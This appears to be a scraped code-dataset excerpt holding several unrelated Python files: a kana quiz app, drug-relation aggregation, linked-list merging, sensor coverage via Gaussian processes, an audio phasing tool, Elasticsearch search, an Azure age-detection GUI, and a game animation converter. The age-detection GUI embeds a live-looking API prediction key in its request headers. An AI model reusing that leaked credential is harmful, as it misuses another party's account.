['wa','ra','ya','ma','ha','na','ta','sa','ka','a','ri','mi','hi','ni','chi','shi','ki','i'\r\n ,'ru','yu','mu','fu/hu','nu','tsu','su','ku','u','n','re','me','he','ne','te','se','ke','e'\r\n ,'wo','ro','yo','mo','ho','no','to','so','ko','o','pa','ba','da','za','ga','pi','bi','dzi','ji','gi'\r\n ,'pu','bu','dzu','zu','gu','pe','be','de','ze','ge','po','bo','do','zo','go']\r\n\r\n\r\n\r\n\r\nclass JapaneseLesson(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"Learn Japanese!! - こにちわ!!\")\r\n self.setGeometry(1500,500,400,200)\r\n self.hiragana = HIRAGANA\r\n self.katakana = KATAKANA\r\n self.sounds = SOUNDS\r\n self.counter = 0\r\n self.correct = 0\r\n self.incorrect = 0\r\n\r\n\r\n\r\n #Create Hiragana / Katakana label\r\n self.index = random.randint(0, len(self.hiragana) - 1)\r\n self.japanese_label = QLabel(self.hiragana[self.index], self)\r\n print(self.sounds[self.index])\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.japanese_label.setFont(QFont('Arial', 24))\r\n self.japanese_label.setAlignment(Qt.AlignCenter)\r\n\r\n #Track Correct and Incorrect scores\r\n self.correct_label = QLabel(\"Correct: \" + str(self.correct), self)\r\n self.correct_label.setFont(QFont('Arial', 12))\r\n \r\n self.incorrect_label = QLabel(\"Incorrect: \" + str(self.incorrect), self)\r\n self.incorrect_label.setFont(QFont('Arial', 12))\r\n\r\n\r\n #Create Text Box\r\n self.textbox = QLineEdit(self)\r\n\r\n #Create Button\r\n self.button = QPushButton('Show Answer', self)\r\n self.button.setFont(QFont('Arial', 11))\r\n\r\n #Connect button to function on_click\r\n self.button.clicked.connect(self.on_click)\r\n\r\n layout = QGridLayout()\r\n layout.addWidget(self.correct_label, 0, 0)\r\n layout.addWidget(self.incorrect_label, 1, 0)\r\n layout.addWidget(self.japanese_label, 0, 1)\r\n layout.addWidget(self.textbox, 1, 1)\r\n layout.addWidget(self.button, 2, 1)\r\n\r\n central_widget = QWidget(self)\r\n central_widget.setLayout(layout)\r\n self.setCentralWidget(central_widget)\r\n\r\n def update_labels(self):\r\n self.correct_label.setText(f\"Correct: {str(self.correct)}\")\r\n self.incorrect_label.setText(f\"Incorrect: {str(self.incorrect)}\")\r\n\r\n def on_click(self):\r\n textboxValue = self.textbox.text()\r\n \r\n #Check user input\r\n if textboxValue.lower() == self.sounds[self.index]: \r\n self.japanese_label.setStyleSheet(\"background-color: lightgreen; border: 1px solid black;\")\r\n QMessageBox.question(self, 'Correct!', \"You're Right!\", QMessageBox.Ok)\r\n self.textbox.setText(\"\")\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.correct += 1\r\n self.counter += 1\r\n self.change_character()\r\n\r\n elif textboxValue.lower() != self.sounds[self.index] and textboxValue != \"\":\r\n self.japanese_label.setStyleSheet(\"background-color: lightcoral; border: 1px solid black;\")\r\n QMessageBox.question(self, \"Wrong!\", f\"You got it wrong you ding dong! The correct answer was '{self.sounds[self.index]}'\", QMessageBox.Ok)\r\n self.textbox.setText(\"\")\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.incorrect += 1\r\n self.counter += 1\r\n self.change_character()\r\n else:\r\n self.japanese_label.setStyleSheet(\"background-color: aqua; border: 1px solid black;\")\r\n QMessageBox.information(self,\"Invalid Input\", \"Please enter a valid sound.\", QMessageBox.Ok)\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n\r\n self.update_labels()\r\n\r\n\r\n def change_character(self):\r\n #Update Japanese character after each round, decide if new character will be Hiragana or Katakana\r\n character_set = random.randint(0,1)\r\n self.index = random.randint(0, len(self.hiragana) - 1)\r\n \r\n if character_set == 1:\r\n self.japanese_label.setText(self.katakana[self.index])\r\n else:\r\n self.japanese_label.setText(self.hiragana[self.index])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n window = JapaneseLesson()\r\n window.show()\r\n sys.exit(app.exec_())","repo_name":"DavidR2134/JapaneseQT","sub_path":"JapaneseQT.py","file_name":"JapaneseQT.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38100373943","text":"import argparse\nfrom collections import defaultdict\nimport jsonlines\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--extracted-relations-file', type=str, required=False, default=\"/Users/vijay/Downloads/extracted_drugs_distant_supervision_large_multi_sentences_per_doc.jsonl\")\nparser.add_argument('--min-frequency', type=int, required=False, default=20)\nparser.add_argument('--label-threshold', type=int, required=False, default=0.6)\n\n\ndef return_relations_meeting_frequency(relation_counts, min_freq):\n relations = []\n for r, freq in relation_counts.items():\n if freq >= min_freq:\n relations.append(list(r))\n return relations\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n relation_labels = {\"COMB\": defaultdict(int), \"POS\": defaultdict(int), \"NEG\": defaultdict(int), \"NO_COMB\": defaultdict(int)}\n for row in tqdm(jsonlines.open(args.extracted_relations_file)):\n drug_relation = tuple(row[\"drug_combination\"])\n pos_prob = row[\"relation_probabilities\"][\"POS\"]\n neg_prob = row[\"relation_probabilities\"][\"NEG\"]\n comb_prob = pos_prob + neg_prob + row[\"relation_probabilities\"][\"COMB\"]\n no_comb_prob = row[\"relation_probabilities\"][\"NO_COMB\"]\n if pos_prob > args.label_threshold:\n relation_labels[\"POS\"][drug_relation] += 1\n if neg_prob > args.label_threshold:\n relation_labels[\"NEG\"][drug_relation] += 1\n if comb_prob > args.label_threshold:\n relation_labels[\"COMB\"][drug_relation] += 1\n if no_comb_prob > args.label_threshold:\n relation_labels[\"NO_COMB\"][drug_relation] += 1\n \n positive_relations = return_relations_meeting_frequency(relation_labels[\"POS\"], args.min_frequency)\n negative_relations = return_relations_meeting_frequency(relation_labels[\"NEG\"], args.min_frequency)\n no_comb_relations = return_relations_meeting_frequency(relation_labels[\"NO_COMB\"], args.min_frequency*10)\n\n breakpoint()\n\n with open(\"positive_relations_20_thresh.json\", 'w') as outfile:\n positives_writer = jsonlines.Writer(outfile)\n positives_writer.write_all(positive_relations)\n with open(\"negative_relations_20_thresh.json\", 'w') as outfile:\n negatives_writer = jsonlines.Writer(outfile)\n negatives_writer.write_all(negative_relations)\n \n","repo_name":"viswavi/drug-synergy-models-","sub_path":"scripts/aggregate_extracted_relations.py","file_name":"aggregate_extracted_relations.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7750943840","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 5 12:14:13 2019\n\n@author: kishan\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution(object):\n def merge2List(self, l1, l2):\n dummyHead = ListNode(0)\n p = dummyHead\n while l1 is not None and l2 is not None:\n if l1.val <= l2.val:\n p.next = l1\n l1 = l1.next\n else:\n p.next = l2\n l2 = l2.next\n p = p.next\n if l1:\n p.next = l1\n if l2:\n p.next = l2\n return dummyHead.next\n\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n # Divide and conqure\n end = len(lists) - 1\n while end > 0:\n begin = 0\n while begin < end:\n lists[begin] = self.merge2List(lists[begin], lists[end])\n begin += 1\n end -= 1\n return lists[0]\n\n\ns = Solution()\nl1 = ListNode(1)\nl1.next = ListNode(2)\nl1.next.next = ListNode(3)\nl2 = ListNode(1)\nl2.next = ListNode(70)\nl2.next.next = ListNode(99)\nl3 = ListNode(4)\nl3.next = ListNode(10)\nl3.next.next = ListNode(15)\nk_sort = s.mergeKLists([l1, l2, l3])\ncurr = k_sort\nresult = []\nwhile curr:\n result.append(curr.val)\n curr = curr.next\nprint(result)\n","repo_name":"kishan3/leetcode_solutions","sub_path":"23_divide_conquer.py","file_name":"23_divide_conquer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73649899771","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom itertools import count, combinations\n\nimport numpy as np\nimport scipy as sp\nimport scipy.linalg as lin\nimport scipy.optimize as opt\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\n\nfrom topology.spaces import CellComplex\nfrom topology.persistence import PairCells\nfrom topology.algorithm import max_cliques\n\n##------------------------------------------------------------------------------\n## Paramètres\nnsensors = 20 # Bombre de capteurs\nsigma_n = 0.01 # Variance du bruit de mesure\nnsampling = 50 # Taille de la grille de la regression\npseuil = 0.2 # seuil \\propto varsigma^2\nnp.random.seed(1235) # 1235 => 2 trous pour 20 capteurs\n\ndef field(z):\n return 0.7*np.exp(-16*abs(z-0.75-0.5j)**2) + 0.5*np.exp(-16*abs(z-0.2-0.7j)**2);\n\n\n##------------------------------------------------------------------------------\n## Capteurs\nclass Sensor:\n def __init__(self, id, z, f):\n self.id = id\n self.loc = z\n self.field = f\n self.covar = {}\n\n def __repr__(self):\n return \"%2d@%3f\" % (self.id, self.loc)\n\n\n##------------------------------------------------------------------------------\n## Gaussian Process stuff\n\ndef kernel(z, w, varsigma, ell):\n z = np.asarray(z)\n w = np.asarray(w)\n if z.shape == ():\n Z, W = z, w\n else:\n Z = z.flatten()[:, np.newaxis].repeat(w.size, axis=1)\n W = w.flatten()[np.newaxis, :].repeat(z.size, axis=0)\n return varsigma**2 * np.exp(-abs(Z-W)**2/ell**2)\n\n\ndef loglikelihood(zm, fm, s, t, n):\n R = lin.cholesky(kernel(zm, zm, s, t) + n * np.eye(zm.size), lower=True)\n return -sum(lin.solve(R, fm) ** 2) - np.log(R.diagonal().prod())\n\n\ndef precision(*vertices):\n K = np.array([[s.covar[t] for s in vertices] for t in vertices])\n ub = K.diagonal()\n lb = K.min(axis=1)\n H = lin.inv(K)\n H = (H + H.T)/2\n x,n,r = opt.fmin_tnc(func=lambda x: x.dot(H.dot(x)),\n fprime=lambda x: 2*H.dot(x),\n x0=(lb + ub)/2,\n bounds=zip(lb, ub),\n disp=0)\n return x.dot(H.dot(x))\n\n\n##------------------------------------------------------------------------------\n## Champ + Capteur + Estimation\n\n# Création du champ\netendue = np.linspace(0, 1, nsampling)\nxe, ye = np.meshgrid(etendue, etendue)\nze = xe + 1j*ye\nfe = field(ze)\n\n\n# Positionnement des capteurs\nzm = np.dot([1, 1j], np.random.rand(2, nsensors))\nfm = field(zm) + sigma_n * np.random.normal(size=zm.shape)\n\n\n# Optimisation des hyperparametres pour le GP\nvarsigma, ell = opt.fmin(lambda x: -loglikelihood(zm, fm, x[0], x[1], sigma_n), [1, 1], disp=False)\nprint(\"varsigma:\", varsigma, \"ell:\", ell)\n\n\n# Création des capteurs\nsensors = [Sensor(i, z, f) for i, z, f in zip(count(), zm, fm)]\nfor s in sensors:\n s.covar = dict((t, kernel(s.loc, t.loc, varsigma, ell)) for t in sensors)\n s.covar[s] = s.covar[s] + sigma_n**2\n\n\n# Estimation du champ par GP\nKmm = kernel(zm, zm, varsigma, ell) + sigma_n**2 * np.eye(nsensors)\nKem = kernel(ze, zm, varsigma, ell)\nKee = kernel(ze, ze, varsigma, ell)\n\nfs = Kem.dot(lin.solve(Kmm, fm)).reshape(ze.shape)\nvs = (Kee - Kem.dot(lin.solve(Kmm, Kem.T))).diagonal().reshape(nsampling, nsampling)\n\n\n##------------------------------------------------------------------------------\n## Construction du complexe\nK = CellComplex()\nneighbors = {}\n\n# Vertices\nfor s in sensors:\n K.add_cell(s)\n\n\n# Edges\nfor s, t in combinations(sensors, 2):\n if precision(s, t) > pseuil * varsigma**2:\n neighbors.setdefault(s, set()).add(t)\n neighbors.setdefault(t, set()).add(s)\n K.add_cell(frozenset([s, t]), [s, t])\n\n\n# k-cliques\nfor clique in max_cliques(neighbors, 4):\n for r in range(3, 5):\n for simplice in combinations(clique, r):\n bords = list(frozenset(s) for s in combinations(simplice, r-1))\n K.add_cell(frozenset(simplice), bords)\n\n\n##------------------------------------------------------------------------------\n## Homologie\nH = PairCells(K, lambda x: 0)\nholes = [H.cascade(s) for s in K.cells(1) if not H.partner(s)]\n\n\n##------------------------------------------------------------------------------\n# Affichage\nplt.figure()\n\n# Field\nplt.subplot(221)\nplt.imshow(fe, extent=(0,1,0,1), origin='lower')\nplt.title('Field')\n\n# Field estimation\nplt.subplot(222)\nplt.imshow(fs, extent=(0,1,0,1), origin='lower')\nplt.plot(zm.real, zm.imag, 'ko')\nplt.title('Field estimation')\n\n# Field estimation variance\nplt.subplot(223)\nplt.imshow(np.log(vs), extent=(0,1,0,1), origin='lower')\nplt.title('Field estimation variance (dB)')\n\n# Complex and holes\na = plt.subplot(224, aspect='equal')\nplt.title('Complex and coverage holes, WUSPE''s method')\na.axis([0, 1, 0, 1])\n\nfor sigma in K.cells(2):\n zs = np.array([(s.loc.real, s.loc.imag) for s in K.vertices(sigma)])\n p = mpatches.Polygon(zs, fill=True, facecolor='b', alpha=.4)\n a.add_artist(p)\n\nfor sigma in K.cells(1):\n zs = np.array([s.loc for s in K.vertices(sigma)])\n p = mlines.Line2D(zs.real, zs.imag, color='k')\n a.add_artist(p)\n\n \nfor h in holes:\n for e in h:\n zs = np.array([s.loc for s in e])\n p = mlines.Line2D(zs.real, zs.imag, color='r', lw=4, alpha=0.4)\n a.add_artist(p)\n\nplt.show(block=False) # Non-blocking call for ipython\n","repo_name":"alban-goupil/WSN-discrete-morse-theory","sub_path":"src/pycov.py","file_name":"pycov.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39031022418","text":"N, K = map(int, input().split())\nd_list = []\nfor i in range(1, N+1):\n if N % i == 0:\n d_list.append(i)\n\nif len(d_list) < K:\n print(0)\nelse:\n print(d_list[K-1])\n\n# 약수의 개수를 먼저 찾자.\n # 약수인 수의 배열을 하나 만들어 약수들을 저장하고 그 길이가 K보다 작으면 0 출력\n # 아니면 K번째 수 출력\n","repo_name":"yoseph0310/Algorithm_Python","sub_path":"BaekJoon/브론즈/3/2501_약수 구하기.py","file_name":"2501_약수 구하기.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70024459451","text":"#!/usr/bin/env python\n\nimport sox\n\n\nclass Sample(object):\n def __init__(self,\n file_name='master_sample.wav',\n start_pad_duration=0,\n end_pad_duration=0):\n self.file_name = file_name\n self.full_duration = sox.file_info.duration(file_name)\n self.start_pad_duration = start_pad_duration\n self.end_pad_duration = end_pad_duration\n\n\nclass Phase(object):\n def __init__(self,\n sample_file_name='master_sample.wav',\n output_file_name='output.wav',\n start_pad_duration=0,\n end_pad_duration=0):\n\n self.sox = sox\n self.sample = Sample(\n sample_file_name,\n start_pad_duration=start_pad_duration,\n end_pad_duration=end_pad_duration)\n self.output_file_name = output_file_name\n self.temp_folder = 'tmp/'\n\n def make_track(self,\n output_file_name,\n gap,\n repeat_count,\n has_initial_rest=False,\n mute_first=False,\n mute_last=False):\n\n rest_duration = self.sample.full_duration + gap - self.sample.start_pad_duration - self.sample.end_pad_duration\n\n if mute_first or mute_last:\n repeat_count -= 1\n\n tfm = sox.Transformer()\n tfm.pad(end_duration=rest_duration)\n if repeat_count > 0:\n tfm.repeat(count=repeat_count)\n if has_initial_rest:\n tfm.pad(start_duration=rest_duration + ((self.sample.full_duration - rest_duration) / 2.0))\n if mute_first:\n tfm.pad(start_duration=self.sample.full_duration + rest_duration)\n if mute_last:\n tfm.pad(end_duration=self.sample.full_duration + rest_duration)\n\n tfm.build(self.sample.file_name, output_file_name)\n\n def checker_track(self,\n output_file_name,\n gap=1.0,\n repeat_count=5,\n mute_first=False,\n mute_last=False):\n\n \"\"\"Repeat the sample on alternating tracks so the fade in and out can overlap\"\"\"\n\n track_a_file = self.temp_folder + 'track-a.wav'\n track_b_file = self.temp_folder + 'track-b.wav'\n\n half, remainder = divmod(repeat_count, 2)\n track_a_repeat_count = half + remainder - 1\n track_b_repeat_count = half - 1\n\n if mute_last:\n if remainder:\n # there are an odd number of repeats, so the muted last repetition is in track A\n self.make_track(track_a_file, gap, track_a_repeat_count, mute_last=mute_last)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True)\n else:\n # there are an even number of repeats, so the muted last repetition is in track B\n self.make_track(track_a_file, gap, track_a_repeat_count)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True, mute_last=mute_last)\n\n else:\n self.make_track(track_a_file, gap, track_a_repeat_count, mute_first=mute_first)\n self.make_track(track_b_file, gap, track_b_repeat_count, has_initial_rest=True)\n\n cbn = sox.Combiner()\n cbn.build([track_a_file, track_b_file], output_file_name, 'mix-power')\n\n def phase(self,\n output_file_name=None,\n n_tracks=9,\n gap=.03,\n repeat_count=20,\n end_align=False):\n\n if output_file_name == None:\n output_file_name = self.output_file_name\n track_file_names = []\n for i in range(1, n_tracks + 1):\n track_file_name = self.temp_folder + 'track-{}.wav'.format(i)\n track_file_names.append(track_file_name)\n\n mute_first = False\n if not end_align and i is not 1:\n mute_first = True\n\n mute_last = False\n if end_align and i is not n_tracks:\n mute_last = True\n\n self.checker_track(\n track_file_name,\n gap=gap * i,\n repeat_count=repeat_count,\n mute_first=mute_first,\n mute_last=mute_last)\n\n if end_align:\n track_durations = [sox.file_info.duration(f) for f in track_file_names]\n longest_track_duration = max(track_durations)\n track_duration_diffs = [longest_track_duration - d for d in track_durations]\n new_track_file_names = []\n for i, diff, track_file_name in zip(range(1, n_tracks + 1), track_duration_diffs, track_file_names):\n new_track_file_name = track_file_name[:-4] + '-start-offset.wav'\n new_track_file_names.append(new_track_file_name)\n tfm = sox.Transformer()\n tfm.pad(start_duration=diff + (gap * i))\n tfm.build(track_file_name, new_track_file_name)\n track_file_names = new_track_file_names\n\n cbn = sox.Combiner()\n cbn.silence(location=1) # Remove silence from the beginning\n cbn.silence(location=-1) # Remove silence from the end\n cbn.build(track_file_names, output_file_name, 'mix-power')\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-n',\n '--n-tracks',\n help='how many tracks to generate',\n type=int,\n default=9)\n parser.add_argument(\n '-g',\n '--gap',\n help='the smallest gap between phrases',\n type=float,\n default=.03)\n parser.add_argument(\n '-r',\n '--repeat-count',\n help='the number of times the phrase should repeat',\n type=int,\n default=20)\n parser.add_argument(\n '-e',\n '--end-align',\n help='come together in the end, rather than starting out together',\n action='store_true',\n default=False)\n\n args = parser.parse_args()\n\n phaser = Phase()\n phaser.phase(\n n_tracks=args.n_tracks,\n gap=args.gap,\n repeat_count=args.repeat_count,\n end_align=args.end_align)\n","repo_name":"jonathanmarmor/stable","sub_path":"phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"12174013935","text":"from elasticsearch import Elasticsearch\n\nfrom settings import HOST, PORT, INDEX\n\n\nclass search(object):\n def __init__(self):\n self.connection = Elasticsearch([{'host': HOST, 'port': PORT}])\n pass\n\n def request(self, query):\n result = self.connection.search(index=INDEX, body={\n 'query': {\n 'match': {\n 'abstract': {\n 'query': query,\n 'operator': 'or'\n }\n }\n },\n 'sort': ['_score']\n })\n\n response = result['hits']['hits']\n return list(map(lambda x: x['_source'], response))\n\n def papers(self, ids):\n if len(ids) == 0:\n return []\n\n response = self.connection.mget(index=INDEX,\n doc_type='articles',\n body={'ids': ids})\n\n founded = lambda x: x['found']\n source = lambda x: x['_source']\n return list(map(source, filter(founded, response['docs'])))\n","repo_name":"wimag/ABC","sub_path":"server/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21039810084","text":"import tkinter\nfrom tkinter import filedialog\nimport numpy as np\nfrom PIL import Image, ImageTk\nimport requests\n\ndef select_file():\n global selectedfile, idPrediction\n filetypes = (('jpg files', '*.jpg'),('png files', '*.png'))\n selectedfile = filedialog.askopenfilename(title='Open a file',initialdir='/',filetypes=filetypes)\n image_binary=open(selectedfile,\"rb\").read()\n get_data(image_binary)\n img=Image.open(selectedfile)\n if(img.width>800 or img.height>600):\n if(img.width>img.height):\n ratio=img.width//800\n else:\n ratio=img.height//600\n img=img.resize((int(img.width/ratio),int(img.height/ratio)))\n img = ImageTk.PhotoImage(img)\n image_holder.configure(image=img)\n image_holder.image=img\n image_holder.update()\n\ndef get_data(image):\n api=\"https://westeurope.api.cognitive.microsoft.com/customvision/v3.0/Prediction/ae92ba00-9473-4623-8c0e-222b55e5c928/classify/iterations/Age%20detection%20model/image\"\n headers={'Prediction-Key':'dd0d11819da040928e44d10890ec2044','Content-Type':'application/octet-stream'}\n response = requests.post(api,headers=headers,data=image)\n if response.status_code == 200:\n response_dict=response.json()\n probabilities=\"Age group probability:\"+'\\n'+'\\n'\n for i in range(len(response_dict[\"predictions\"])):\n tag=response_dict[\"predictions\"][i][\"tagName\"]\n probabilities+=(str(round(response_dict[\"predictions\"][i][\"probability\"]*100,2))+\"% \"+tag)+'\\n'\n text_holder.configure(text=probabilities)\n else:\n print(f\"Hello person, there's a {response} error with your request\")\n\nglobal cam, selectedfile,idPrediction,image_holder, text_holder, img\nidPrediction=[]\n\nwindow=tkinter.Tk()\nwindow.title(\"Age prediction\")\nframe=np.random.randint(0,255,[600,800,3],dtype='uint8')\nimg = ImageTk.PhotoImage(Image.fromarray(frame))\nimage_holder=tkinter.Label(window, bg=\"#fff\")\nimage_holder.configure(image=img,width=800, height=600)\nimage_holder.grid(row=0,column=0,pady=10,padx=10)\nmessage=\"Waiting for image selection\"\ntext_holder=tkinter.Label(window,text=message,bg='#fff')\ntext_holder.grid(row=0, rowspan=5,column=1,pady=1,padx=20)\nbuttonsize=10\nopen_button = tkinter.Button(window,text='Select image',command=select_file)\nopen_button.grid(row=1,column=0,columnspan=2,pady=10,padx=1)\nimage_holder.update()\nwindow.mainloop()\n","repo_name":"fury565/RUAP-Projekt","sub_path":"AgeDetectionGUI.py","file_name":"AgeDetectionGUI.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10184350114","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport re\nimport json\n\nfrom bs4 import BeautifulSoup\n\n\n\ndef filter_use_data(content):\n pattern = re.compile(r'([\\w ]+)')\n l = pattern.split(content)[1:]\n i = 0\n q = {}\n result = []\n for s in l:\n if i % 2 == 0:\n q = {\"name\": s}\n else:\n q[\"content\"] = s\n result.append(q)\n i = i + 1\n return result\n\n\ndef replenish_omit_data(image_xml_data):\n content = image_xml_data['content']\n soup = BeautifulSoup(content, 'html.parser')\n frame_list = soup.find_all('t')\n pre_frame_data = None\n use_pre = False\n image = None\n final_data = []\n index = 0\n is_none = False\n for frame in frame_list:\n json_data = {}\n if pre_frame_data is not None:\n use_pre = True\n for arg in frame.children:\n arg_name = arg.name\n arg_data = arg.string\n if arg_name == \"i\":\n arg_data = arg_data.replace(\"IMAGE_REANIM_\", \"\").lower()\n image = arg_data\n json_data[arg_name] = arg_data\n if arg_name == \"f\":\n if arg_data == \"-1\":\n is_none = True\n # use_pre = False\n else:\n is_none = False\n if image is None:\n is_none = True\n # else:\n # if \"gatlingpea_blink\" in image:\n # print(pre_frame_data)\n replenish_args_default_map = {'sx': 1, 'sy': 1, 'kx': 0, 'ky': 0, 'x': 0, 'y': 0, \"i\": None}\n index = index + 1\n if not is_none and pre_frame_data is not None and use_pre:\n for replenish_arg in replenish_args_default_map:\n if replenish_arg not in json_data and replenish_arg in pre_frame_data:\n json_data[replenish_arg] = pre_frame_data[replenish_arg]\n\n if not is_none:\n for replenish_arg in replenish_args_default_map:\n if replenish_arg not in json_data:\n json_data[replenish_arg] = replenish_args_default_map[replenish_arg]\n pre_frame_data = json_data\n if image is not None:\n json_data[\"i\"] = image\n # else:\n # pre_frame_data = None\n\n final_data.append(json_data)\n image_xml_data['content'] = final_data\n\n\ndef getFrame(num, l):\n result = []\n for i in l:\n content = i[\"content\"][num]\n q = {}\n for k in content:\n if content[k] is not None:\n q[k] = content[k]\n if len(q) != 0:\n result.append(q)\n return result\n\n\ndef remove_action_data(image_xml_data_list):\n action_map = {}\n need_remove_map = {}\n for image_data in image_xml_data_list:\n content = image_data['content']\n empty = True\n filter_name = image_data['name'].replace(\"anim_\", \"\")\n for json_data in content:\n if \"i\" in json_data:\n empty = False\n need_remove_map[filter_name] = empty\n if (\"anim_\" in image_data['name']) or image_data['name'] == \"Sun1\":\n action_map[filter_name] = {}\n filter_data_list = []\n for image_data in image_xml_data_list:\n filter_name = image_data['name'].replace(\"anim_\", \"\")\n if not need_remove_map[filter_name]:\n filter_data_list.append(image_data)\n index = 0\n content = image_data['content']\n if filter_name not in action_map:\n continue\n begin = None\n over = None\n if \"f\" not in content[0] or content[0][\"f\"] == 0:\n begin = 0\n # print(content)\n # print(len(content))\n for c in content:\n if begin is not None and over is not None:\n break\n if begin is None and len(c) > 0:\n if not (\"f\" in c and c['f'] == \"-1\"):\n begin = index\n if over is None and begin is not None and len(c) > 0:\n if \"f\" in c and c['f'] == \"-1\":\n over = index - 1\n index = index + 1\n\n if over is None:\n over = index - 1\n\n action_map[filter_name]['begin'] = begin\n action_map[filter_name]['over'] = over\n image_xml_data_list.clear()\n for filter_data in filter_data_list:\n image_xml_data_list.append(filter_data)\n return action_map\n\n\ndef c_build(begin, over, all_image_data_list):\n result = []\n i = begin\n while i <= over:\n child_result = []\n for image_data_list in all_image_data_list:\n data = image_data_list['content'][i]\n if \"f\" in data:\n data.pop(\"f\")\n if len(data) > 0:\n child_result.append(image_data_list['content'][i])\n i = i + 1\n result.append(child_result)\n return result\n\n\ndef speed_build(begin, over, speed_data):\n result = []\n i = begin\n\n while i <= over:\n result.append(speed_data[i])\n i = i + 1\n return result\n\n\ndef get_speed_data(original_data_list):\n result = []\n content = None\n now_x = None\n for data in original_data_list:\n if data['name'] == '_ground':\n content = data['content']\n if content is None:\n return result\n for frame in content:\n speed = 0\n if \"f\" in frame:\n if frame[\"f\"] == \"0\":\n speed = 0\n now_x = float(frame['x'])\n else:\n speed = 0\n elif \"x\" not in frame:\n speed = 0\n else:\n x = float(frame['x'])\n if (now_x == None):\n now_x = x\n speed = '%.4f' % (x - now_x)\n now_x = x\n result.append(float(speed))\n\n return result\n\n\ndef build(name):\n with open(\"zombie\" + \"/\" + name + '.reanim') as file_obj:\n content = file_obj.read()\n original_data_list = filter_use_data(content)\n\n for original_data in original_data_list:\n replenish_omit_data(original_data)\n speed_data = get_speed_data(original_data_list)\n action_map = remove_action_data(original_data_list)\n\n result = {}\n images = set()\n\n for action in action_map:\n data = action_map[action]\n result[action] = {}\n action_list = c_build(data['begin'], data['over'], original_data_list)\n for w in action_list:\n for e in w:\n images.add(e['i'])\n\n result[action]['actionList'] = action_list\n if len(speed_data) > 0:\n speed_list = speed_build(data['begin'], data['over'], speed_data)\n speed_list = speed_list[1:] + [0]\n result[action]['speedList'] = speed_list\n l=[]\n for image in images:\n l.append(image)\n with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\json\\\\\" + name + \".json\", \"w\", encoding='utf-8') as f:\n f.write(json.dumps(result))\n f.close()\n\nif __name__ == '__main__':\n l = ['LadderZombie']\n for i in l:\n build(i)\n","repo_name":"vajva/PVZ-ReanimToJson","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25708060419","text":"\"\"\"Processes .csv result files and aggregates them.\"\"\"\n\nimport argparse\nimport csv\nfrom datetime import date\nimport logging\nimport os\nimport re\nimport sys\nimport tiers\nimport itertools\nfrom typing import Any, Dict, List\nimport numpy as np\nfrom scipy.stats.mstats import gmean\n\ntry:\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n has_matplotlib = True\nexcept ImportError:\n has_matplotlib = False\n\nlogger = logging.getLogger(__name__)\n\ntest_to_csv_field_name = {\n 'inference': {\n 'test': 'eval',\n 'xla_label': 'openxla_eval',\n 'inductor_label': 'inductor',\n },\n 'training': {\n 'test': 'train',\n 'xla_label': 'openxla',\n 'inductor_label': 'inductor',\n },\n}\n\n\ndef find_files(input_dirname: str) -> List[str]:\n files = []\n for root, _, filenames in os.walk(input_dirname):\n for filename in filenames:\n match = re.search(r'.*\\.csv$', filename)\n if match:\n files.append(os.path.join(root, filename))\n return files\n\n\ndef clean_up_accelerator_model(model: str) -> str:\n if re.search(r'One of Tesla V100', model):\n return 'v100'\n if re.search(r'One of Quadro P1000, NVIDIA RTX A6000', model):\n return 'a6000'\n if re.search(r'NVIDIA A100-SXM4-40GB', model):\n return 'a100'\n sys.exit(f\"fatal: cannot recognize accelerator model: '{model}'.\")\n\n\ndef skip_model(args, model_name: str):\n return (not re.search(\"|\".join(args.filter), model_name, re.I) or\n re.search(\"|\".join(args.exclude), model_name, re.I))\n\n\ndef process_file(args, results_map: Dict[str, Any], filename: str):\n with open(filename) as check_header_file:\n try:\n has_header = 